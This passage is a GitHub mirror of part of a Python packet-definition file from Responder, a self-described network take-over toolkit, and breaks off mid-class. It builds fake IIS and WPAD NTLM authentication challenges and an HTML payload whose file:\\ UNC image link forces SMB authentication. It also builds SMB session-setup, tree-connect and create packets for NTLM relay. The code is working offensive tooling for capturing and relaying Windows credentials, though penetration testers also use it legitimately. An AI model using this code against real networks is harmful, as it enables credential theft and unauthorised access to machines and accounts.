mirror of
https://github.com/lgandx/Responder.git
synced 2024-10-17 20:50:25 -07:00
3d9147f36c
`==` should be used when comparing values, `is` should be used to compare identities. Modern versions of Python throw a SyntaxWarning.
1126 lines
52 KiB
Python
1126 lines
52 KiB
Python
#!/usr/bin/env python
|
|
# -*- coding: latin-1 -*-
|
|
# This file is part of Responder, a network take-over set of tools
|
|
# created and maintained by Laurent Gaffie.
|
|
# email: laurent.gaffie@gmail.com
|
|
# This program is free software: you can redistribute it and/or modify
|
|
# it under the terms of the GNU General Public License as published by
|
|
# the Free Software Foundation, either version 3 of the License, or
|
|
# (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful,
|
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
# GNU General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
import struct
|
|
import os
|
|
import sys
|
|
from odict import OrderedDict
|
|
import datetime
|
|
from base64 import b64decode, b64encode
|
|
|
|
# Packet class handling all packet generation (see odict.py).
|
|
class Packet():
|
|
fields = OrderedDict([
|
|
("data", ""),
|
|
])
|
|
def __init__(self, **kw):
|
|
self.fields = OrderedDict(self.__class__.fields)
|
|
for k,v in kw.items():
|
|
if callable(v):
|
|
self.fields[k] = v(self.fields[k])
|
|
else:
|
|
self.fields[k] = v
|
|
def __str__(self):
|
|
return "".join(map(str, self.fields.values()))
|
|
|
|
#Python version
|
|
if (sys.version_info > (3, 0)):
|
|
PY2OR3 = "PY3"
|
|
else:
|
|
PY2OR3 = "PY2"
|
|
|
|
def StructWithLenPython2or3(endian,data):
|
|
#Python2...
|
|
if PY2OR3 == "PY2":
|
|
return struct.pack(endian, data)
|
|
#Python3...
|
|
else:
|
|
return struct.pack(endian, data).decode('latin-1')
|
|
|
|
##################HTTP Proxy Relay##########################
|
|
def HTTPCurrentDate():
|
|
Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
|
|
return Date
|
|
|
|
#407 section.
|
|
class WPAD_Auth_407_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"),
|
|
("Connection", "Proxy-Connection: close\r\n"),
|
|
("Cache-Control", "Cache-Control: no-cache\r\n"),
|
|
("Pragma", "Pragma: no-cache\r\n"),
|
|
("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
|
|
class WPAD_NTLM_Challenge_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWWAuth", "Proxy-Authenticate: NTLM "),
|
|
("Payload", ""),
|
|
("Payload-CRLF", "\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
def calculate(self,payload):
|
|
self.fields["Payload"] = b64encode(payload)
|
|
|
|
#401 section:
|
|
class IIS_Auth_401_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
class IIS_Auth_Granted(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
|
|
("ContentLen", "Content-Length: "),
|
|
("ActualLen", "76"),
|
|
("CRLF", "\r\n\r\n"),
|
|
("Payload", "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
|
|
])
|
|
def calculate(self):
|
|
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
|
|
class IIS_NTLM_Challenge_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWWAuth", "WWW-Authenticate: NTLM "),
|
|
("Payload", ""),
|
|
("Payload-CRLF", "\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
def calculate(self,payload):
|
|
self.fields["Payload"] = b64encode(payload)
|
|
|
|
class IIS_Basic_401_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
|
|
("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"),
|
|
("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
##################WEBDAV Relay Packet#########################
|
|
class WEBDAV_Options_Answer(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
|
("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
|
|
("Connection", "Connection: Keep-Alive\r\n"),
|
|
("Content-Type", "Content-Type: text/html\r\n"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
##################SMB Relay Packet############################
|
|
def midcalc(data): #Set MID SMB Header field.
|
|
return data[34:36].decode('latin-1')
|
|
|
|
def uidcalc(data): #Set UID SMB Header field.
|
|
return data[32:34].decode('latin-1')
|
|
|
|
def pidcalc(data): #Set PID SMB Header field.
|
|
return data[30:32].decode('latin-1')
|
|
|
|
def tidcalc(data): #Set TID SMB Header field.
|
|
return data[28:30].decode('latin-1')
|
|
|
|
#Response packet.
|
|
class SMBRelayNegoAns(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x11"),
|
|
("Dialect", ""),
|
|
("Securitymode", "\x03"),
|
|
("MaxMpx", "\x32\x00"),
|
|
("MaxVc", "\x01\x00"),
|
|
("MaxBuffSize", "\x04\x41\x00\x00"),
|
|
("MaxRawBuff", "\x00\x00\x01\x00"),
|
|
("SessionKey", "\x00\x00\x00\x00"),
|
|
("Capabilities", "\xfd\xf3\x01\x80"),
|
|
("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
|
|
("SrvTimeZone", "\xf0\x00"),
|
|
("KeyLen", "\x00"),
|
|
("Bcc", "\x10\x00"),
|
|
("Guid", os.urandom(16).decode('latin-1')),
|
|
])
|
|
|
|
##Response packet.
|
|
class SMBRelayNTLMAnswer(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x04"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00"),
|
|
("Andxoffset", "\x5f\x01"),
|
|
("Action", "\x00\x00"),
|
|
("SecBlobLen", "\xea\x00"),
|
|
("Bcc", "\x34\x01"),
|
|
###NTLMPACKET
|
|
("Data", ""),
|
|
###NTLMPACKET
|
|
|
|
])
|
|
|
|
|
|
#Request packet (no calc):
|
|
class SMBSessionSetupAndxRequest(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x0c"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved","\x00" ),
|
|
("AndXOffset", "\xec\x00"),
|
|
("MaxBuff","\xff\xff"),
|
|
("MaxMPX", "\x32\x00"),
|
|
("VCNumber","\x00\x00"),
|
|
("SessionKey", "\x00\x00\x00\x00"),
|
|
###NTLMPACKET
|
|
("Data", ""),
|
|
###NTLMPACKET
|
|
])
|
|
|
|
class SMBSessEmpty(Packet):
|
|
fields = OrderedDict([
|
|
("Empty", "\x00\x00\x00"),
|
|
])
|
|
##################SMB Request Packet##########################
|
|
class SMBHeader(Packet):
|
|
fields = OrderedDict([
|
|
("proto", "\xff\x53\x4d\x42"),
|
|
("cmd", "\x72"),
|
|
("errorcode", "\x00\x00\x00\x00" ),
|
|
("flag1", "\x08"),
|
|
("flag2", "\x01\xc8"),
|
|
("pidhigh", "\x00\x00"),
|
|
("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("Reserved", "\x00\x00"),
|
|
("tid", "\x00\x00"),
|
|
("pid", "\x3c\x1b"),
|
|
("uid", "\x00\x00"),
|
|
("mid", "\x00\x00"),
|
|
])
|
|
|
|
class SMBNegoCairo(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x00"),
|
|
("Bcc", "\x62\x00"),
|
|
("Data", "")
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<H",len(str(self.fields["Data"])))
|
|
|
|
class SMBNegoCairoData(Packet):
|
|
fields = OrderedDict([
|
|
("Separator1","\x02" ),
|
|
("Dialect1", "Cairo 0.xa\x00"), #Let's talk Cairo!
|
|
])
|
|
|
|
class SMBSessionSetupAndxNEGO(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x0c"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved","\x00" ),
|
|
("AndXOffset", "\xec\x00"),
|
|
("MaxBuff","\xff\xff"),
|
|
("MaxMPX", "\x32\x00"),
|
|
("VCNumber","\x00\x00"),
|
|
("SessionKey", "\x00\x00\x00\x00"),
|
|
("SecBlobLen","\x4a\x00"),
|
|
("Reserved2","\x00\x00\x00\x00"),
|
|
("Capabilities", "\xfc\xe3\x01\x80"),
|
|
("Bcc","\xb1\x00"),
|
|
##gss api starts here.
|
|
("ApplicationHeaderTag","\x60"),
|
|
("ApplicationHeaderLen","\x48"),
|
|
("AsnSecMechType","\x06"),
|
|
("AsnSecMechLen","\x06"),
|
|
("AsnSecMechStr","\x2b\x06\x01\x05\x05\x02"),
|
|
("ChoosedTag","\xa0"),
|
|
("ChoosedTagStrLen","\x3e"),
|
|
("NegTokenInitSeqHeadTag","\x30"),
|
|
("NegTokenInitSeqHeadLen","\x3c"),
|
|
("NegTokenInitSeqHeadTag1","\xA0"),
|
|
("NegTokenInitSeqHeadLen1","\x0e"),
|
|
("NegTokenInitSeqNLMPTag","\x30"),
|
|
("NegTokenInitSeqNLMPLen","\x0c"),
|
|
("NegTokenInitSeqNLMPTag1","\x06"),
|
|
("NegTokenInitSeqNLMPTag1Len","\x0a"),
|
|
("NegTokenInitSeqNLMPTag1Str","\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
|
|
("NegTokenInitSeqNLMPTag2","\xa2"),
|
|
("NegTokenInitSeqNLMPTag2Len","\x2a"),
|
|
("NegTokenInitSeqNLMPTag2Octet","\x04"),
|
|
("NegTokenInitSeqNLMPTag2OctetLen","\x28"),
|
|
## NTLM packet ##
|
|
("Data", ""),
|
|
## NTLM packet ##
|
|
("NegTokenInitSeqMechMessageVersionTerminator","\x00"),
|
|
("NativeOs","Windows 2002 Service Pack 3 2600"),
|
|
("NativeOsTerminator","\x00\x00"),
|
|
("NativeLan","Windows 2002 5.1"),
|
|
("NativeLanTerminator","\x00\x00\x00\x00"),
|
|
|
|
])
|
|
def calculate(self):
|
|
|
|
self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le').decode('latin-1')
|
|
|
|
CompleteSMBPacketLen = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["AndXOffset"])+str(self.fields["MaxBuff"])+str(self.fields["MaxMPX"])+str(self.fields["VCNumber"])+str(self.fields["SessionKey"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])+str(self.fields["Capabilities"])+str(self.fields["Bcc"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
|
|
|
|
|
|
SecBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
|
|
|
|
|
|
data3 = str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
|
|
|
|
data4 = str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
|
|
|
|
data5 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
|
|
|
|
data6 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["Data"])
|
|
|
|
data10 = str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
|
|
|
|
data11 = str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
|
|
|
|
|
|
## Packet len
|
|
self.fields["AndXOffset"] = StructWithLenPython2or3("<h", len(CompleteSMBPacketLen)+32)
|
|
##Buff Len
|
|
self.fields["SecBlobLen"] = StructWithLenPython2or3("<h", len(SecBlobLen))
|
|
##Complete Buff Len
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h", len(CompleteSMBPacketLen)-27)#session setup struct is 27.
|
|
##App Header
|
|
self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3("<B", len(SecBlobLen)-2)
|
|
##Asn Field 1
|
|
self.fields["AsnSecMechLen"] = StructWithLenPython2or3("<B", len(str(self.fields["AsnSecMechStr"])))
|
|
##Asn Field 1
|
|
self.fields["ChoosedTagStrLen"] = StructWithLenPython2or3("<B", len(data3))
|
|
##SpNegoTokenLen
|
|
self.fields["NegTokenInitSeqHeadLen"] = StructWithLenPython2or3("<B", len(data4))
|
|
##NegoTokenInit
|
|
self.fields["NegTokenInitSeqHeadLen1"] = StructWithLenPython2or3("<B", len(data10))
|
|
## Tag0 Len
|
|
self.fields["NegTokenInitSeqNLMPLen"] = StructWithLenPython2or3("<B", len(data11))
|
|
## Tag0 Str Len
|
|
self.fields["NegTokenInitSeqNLMPTag1Len"] = StructWithLenPython2or3("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
|
|
## Tag2 Len
|
|
self.fields["NegTokenInitSeqNLMPTag2Len"] = StructWithLenPython2or3("<B", len(data6))
|
|
## Tag3 Len
|
|
self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = StructWithLenPython2or3("<B", len(str(self.fields["Data"])))
|
|
|
|
|
|
class SMBSessionSetupAndxAUTH(Packet):
|
|
fields = OrderedDict([
|
|
("wordcount", "\x0c"),
|
|
("AndXCommand", "\xff"),
|
|
("reserved","\x00" ),
|
|
("andxoffset", "\xfa\x00"),
|
|
("maxbuff","\xff\xff"),
|
|
("maxmpx", "\x32\x00"),
|
|
("vcnum","\x01\x00"),
|
|
("sessionkey", "\x00\x00\x00\x00"),
|
|
("securitybloblength","\x59\x00"),
|
|
("reserved2","\x00\x00\x00\x00"),
|
|
("capabilities", "\xfc\xe3\x01\x80"),
|
|
("bcc1","\xbf\x00"),
|
|
("ApplicationHeaderTag","\xa1"),
|
|
("ApplicationHeaderTagLenOfLen","\x81"),
|
|
("ApplicationHeaderLen","\xd1"),
|
|
("AsnSecMechType","\x30"),
|
|
("AsnSecMechLenOfLen","\x81"),
|
|
("AsnSecMechLen","\xce"),
|
|
("ChoosedTag","\xa2"),
|
|
("ChoosedTagLenOfLen","\x81"),
|
|
("ChoosedTagLen","\xcb"),
|
|
("ChoosedTag1","\x04"),
|
|
("ChoosedTag1StrLenOfLen","\x81"),
|
|
("ChoosedTag1StrLen","\xc8"),
|
|
#### NTLM Packet ####
|
|
("Data", ""),
|
|
#### End Of SMB ####
|
|
("NLMPAuthMsgNull","\x00"),
|
|
("NativeOs","Unix"),
|
|
("NativeOsTerminator","\x00\x00"),
|
|
("ExtraNull",""),
|
|
("NativeLan","Samba"),
|
|
("NativeLanTerminator","\x00\x00"),
|
|
("AndxPadding",""),
|
|
])
|
|
|
|
|
|
def calculate(self):
|
|
self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NativeLan"] = self.fields["NativeLan"].encode('utf-16le').decode('latin-1')
|
|
|
|
SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
|
|
|
|
NTLMData = str(self.fields["Data"])
|
|
###### ASN Stuff
|
|
if len(NTLMData) > 255:
|
|
self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
|
|
self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-0)
|
|
else:
|
|
self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
|
|
self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-3)
|
|
|
|
if len(NTLMData)-8 > 255:
|
|
self.fields["AsnSecMechLenOfLen"] = "\x82"
|
|
self.fields["AsnSecMechLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-4)
|
|
else:
|
|
self.fields["AsnSecMechLenOfLen"] = "\x81"
|
|
self.fields["AsnSecMechLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-6)
|
|
|
|
if len(NTLMData)-12 > 255:
|
|
self.fields["ChoosedTagLenOfLen"] = "\x82"
|
|
self.fields["ChoosedTagLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-8)
|
|
else:
|
|
self.fields["ChoosedTagLenOfLen"] = "\x81"
|
|
self.fields["ChoosedTagLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-9)
|
|
|
|
if len(NTLMData)-16 > 255:
|
|
self.fields["ChoosedTag1StrLenOfLen"] = "\x82"
|
|
self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-12)
|
|
else:
|
|
self.fields["ChoosedTag1StrLenOfLen"] = "\x81"
|
|
self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-12)
|
|
|
|
CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])+str(self.fields["NLMPAuthMsgNull"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["ExtraNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
|
|
|
|
SecurityBlobLenUpdated = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
|
|
|
|
## Packet len
|
|
self.fields["andxoffset"] = StructWithLenPython2or3("<h", len(CompletePacketLen)+32) #SMB1 Header is always 32
|
|
##Buff Len
|
|
self.fields["securitybloblength"] = StructWithLenPython2or3("<h", len(SecurityBlobLenUpdated))
|
|
##Complete Buff Len
|
|
self.fields["bcc1"] = StructWithLenPython2or3("<h", len(CompletePacketLen)-27) #SessionSetup struct is 27.
|
|
|
|
class SMBTreeConnectData(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x04"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved","\x00" ),
|
|
("Andxoffset", "\x5a\x00"),
|
|
("Flags","\x08\x00"),
|
|
("PasswdLen", "\x01\x00"),
|
|
("Bcc","\x2f\x00"),
|
|
("Passwd", "\x00"),
|
|
("Path","\\\\IPC$"),
|
|
("PathTerminator","\x00\x00"),
|
|
("Service","?????"),
|
|
("Terminator", "\x00"),
|
|
|
|
])
|
|
def calculate(self):
|
|
##Convert Path to Unicode first before any Len calc.
|
|
self.fields["Path"] = self.fields["Path"].encode('utf-16le').decode('latin-1')
|
|
|
|
##Passwd Len
|
|
self.fields["PasswdLen"] = StructWithLenPython2or3("<i", len(str(self.fields["Passwd"])))[:2]
|
|
|
|
##Packet len
|
|
CompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Flags"])+str(self.fields["PasswdLen"])+str(self.fields["Bcc"])+str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
|
|
|
|
self.fields["Andxoffset"] = StructWithLenPython2or3("<i", len(CompletePacket)+32)[:2]
|
|
|
|
##Bcc Buff Len
|
|
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<i", len(BccComplete))[:2]
|
|
|
|
class SMBTreeDisconnect(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x00"),
|
|
("Bcc","\x00\x00"),
|
|
|
|
])
|
|
|
|
class SMBNTCreateData(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x18"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00" ),
|
|
("Andxoffset", "\x00\x00"),
|
|
("Reserved2", "\x00"),
|
|
("FileNameLen", "\x07\x00"),
|
|
("CreateFlags", "\x16\x00\x00\x00"),
|
|
("RootFID", "\x00\x00\x00\x00"),
|
|
("AccessMask", "\x9F\x01\x02\x00"),
|
|
("AllocSize", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("FileAttrib", "\x00\x00\x00\x00"),
|
|
("ShareAccess", "\x03\x00\x00\x00"),
|
|
("Disposition", "\x01\x00\x00\x00"),
|
|
("CreateOptions", "\x40\x00\x40\x00"),
|
|
("Impersonation", "\x02\x00\x00\x00"),
|
|
("SecurityFlags", "\x01"),
|
|
("Bcc", "\x08\x00"),
|
|
("FileName", ""),
|
|
("FileNameNull", "\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
|
|
self.fields["FileNameLen"] = StructWithLenPython2or3("<h",len(str(self.fields["FileName"])))
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(Data1))
|
|
|
|
class SMBNTCreateDataSVCCTL(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x18"),
|
|
("AndXCommand", "\xff"),
|
|
("Reserved", "\x00" ),
|
|
("Andxoffset", "\x00\x00"),
|
|
